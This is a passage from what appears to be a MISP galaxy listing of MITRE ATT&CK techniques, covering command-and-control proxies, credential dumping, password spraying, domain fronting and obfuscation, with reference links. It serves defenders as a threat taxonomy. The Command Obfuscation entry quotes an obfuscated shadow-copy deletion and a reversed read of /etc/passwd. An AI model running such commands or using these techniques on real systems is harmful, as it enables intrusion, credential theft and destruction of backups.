https://github.com/mattifestation/PowerSploit

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Protocol Impersonation - T1001.003

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.

Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related to a trusted entity.

The tag is: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003"

Table 5989. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1001/003

Internal Proxy - T1090.001

Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.

By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.

The tag is: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001"

Table 5990. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1090/001

External Proxy - T1090.002

Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.

External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.

The tag is: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002"

Table 5991. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1090/002

LSA Secrets - T1003.004

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)

[Reg](https://attack.mitre.org/software/S0075) can be used to extract secrets from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)

The tag is: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004"

Table 5992. Table References

Links

https://attack.mitre.org/techniques/T1003/004

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN

https://github.com/mattifestation/PowerSploit

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets

https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf

https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

Proc Filesystem - T1003.007

Adversaries may gather credentials from the proc filesystem or /proc. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the /proc/<PID>/maps file shows how memory is mapped within the process’s virtual address space. The /proc/<PID>/mem file, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)

If running as or with the permissions of a web browser, a process can search the /maps & /mem locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.

The tag is: misp-galaxy:mitre-attack-pattern="Proc Filesystem - T1003.007"

Table 5993. Table References

Links

https://attack.mitre.org/techniques/T1003/007

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem

https://github.com/huntergregal/mimipenguin

https://www.baeldung.com/linux/proc-id-maps

https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use

File Deletion - T1070.004

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"

Table 5994. Table References

Links

https://attack.mitre.org/techniques/T1070/004

https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

Domain Fronting - T1090.004

Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004"

Table 5995. Table References

Links

http://www.icir.org/vern/papers/meek-PETS-2015.pdf

https://attack.mitre.org/techniques/T1090/004

Clear Persistence - T1070.009

Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)

In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Persistence - T1070.009"

Table 5996. Table References

Links

https://attack.mitre.org/techniques/T1070/009

https://blog.talosintelligence.com/recent-cyber-attack/

https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

Password Guessing - T1110.001

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target’s policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies. (Citation: Cylance Cleaver)

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

  • SNMP (161/UDP and 162/TCP/UDP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) Further, adversaries may abuse network device interfaces (such as wlanAPI) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events than attempts over SMB, which create the Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001"

Table 5997. Table References

Links

https://attack.mitre.org/techniques/T1110/001

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi

https://www.us-cert.gov/ncas/alerts/TA18-086A

Password Cracking - T1110.002

Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes is obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes; this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A)

Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services to which the account has access.

The tag is: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002"

Table 5998. Table References

Links

https://attack.mitre.org/techniques/T1110/002

https://en.wikipedia.org/wiki/Password_cracking

https://www.us-cert.gov/ncas/alerts/TA18-106A

Password Spraying - T1110.003

Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events than attempts over SMB, which create the Windows "logon failure" event ID 4625.

The tag is: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003"

Table 5999. Table References

Links

http://www.blackhillsinfosec.com/?p=4645

https://attack.mitre.org/techniques/T1110/003

https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing

https://www.us-cert.gov/ncas/alerts/TA18-086A

Credential Stuffing - T1110.004

Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.

Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies.

Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

  • MSSQL (1433/TCP)

  • Oracle (1521/TCP)

  • MySQL (3306/TCP)

  • VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Credential Stuffing - T1110.004"

Table 6000. Table References

Links

https://attack.mitre.org/techniques/T1110/004

https://www.us-cert.gov/ncas/alerts/TA18-086A

Web Protocols - T1071.001

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP/S (Citation: CrowdStrike Putter Panda) and WebSocket (Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001"

Table 6001. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071/001

https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/

Bidirectional Communication - T1102.002

Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to a development project, updating a document hosted on a Web service, or sending a Tweet.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002"

Table 6002. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1102/002

Malicious Link - T1204.001

An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"

Table 6003. Table References

Links

https://attack.mitre.org/techniques/T1204/001

Port Knocking - T1205.001

Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host-based firewall, but could also be implemented by custom software.

This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

The tag is: misp-galaxy:mitre-attack-pattern="Port Knocking - T1205.001"

Table 6004. Table References

Links

https://attack.mitre.org/techniques/T1205/001

https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631

Binary Padding - T1027.001

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limit the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)

The tag is: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001"

Table 6005. Table References

Links

https://attack.mitre.org/techniques/T1027/001

https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/

https://www.virustotal.com/en/faq/

https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/

Command Obfuscation - T1027.010

Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)

For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `.`, `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”“d.Application”`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globbing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)

Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete).(Citation: Twitter Richard WMIC)

Tools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfuscation</code> have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)

The tag is: misp-galaxy:mitre-attack-pattern="Command Obfuscation - T1027.010"

Table 6006. Table References

Links

https://attack.mitre.org/techniques/T1027/010

https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html

https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16

https://github.com/danielbohannon/Invoke-DOSfuscation

https://github.com/danielbohannon/Invoke-Obfuscation

https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand

https://redcanary.com/threat-detection-report/techniques/powershell/

https://twitter.com/rfackroyd/status/1639136000755765254

https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation

Cloud Services - T1021.007

Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user.

Many enterprises federate centrally managed user identities to cloud services, allowing users to log in with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as <code>Connect-AZAccount</code> for Azure PowerShell, <code>Connect-MgGraph</code> for Microsoft Graph PowerShell, and <code>gcloud auth login</code> for the Google Cloud CLI.

In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Services - T1021.007"

Table 6007. Table References

Links

https://attack.mitre.org/techniques/T1021/007

Mail Protocols - T1071.003

Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003"

Table 6008. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1071/003

Environmental Keying - T1480.001

Adversaries may environmentally key payloads or other features of malware to evade defenses and constrain execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary-supplied, environment-specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)

Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).

Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.

Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.

The tag is: misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001"

Table 6009. Table References

Links

https://attack.mitre.org/techniques/T1480/001

https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf

https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf

https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/

https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices

https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf

Domain Properties - T1590.001

Adversaries may gather information about the victim’s network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001"

Table 6010. Table References

Links

https://attack.mitre.org/techniques/T1590/001

https://dnsdumpster.com/

https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure

https://o365blog.com/post/just-looking/

https://www.circl.lu/services/passive-dns/

https://www.whois.net/

Web Cookies - T1606.001

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.

Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001"

Table 6011. Table References

Links

https://attack.mitre.org/techniques/T1606/001

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wunderwuzzi23.github.io/blog/passthecookie.html

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

Upload Malware - T1608.001

Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022)

Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files.

The tag is: misp-galaxy:mitre-attack-pattern="Upload Malware - T1608.001"

Table 6012. Table References

Links

https://attack.mitre.org/techniques/T1608/001

https://blog.talosintelligence.com/ipfs-abuse/

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

Local Groups - T1069.001

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.

The tag is: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001"

Table 6013. Table References

Links

https://attack.mitre.org/techniques/T1069/001

Default Accounts - T1078.001

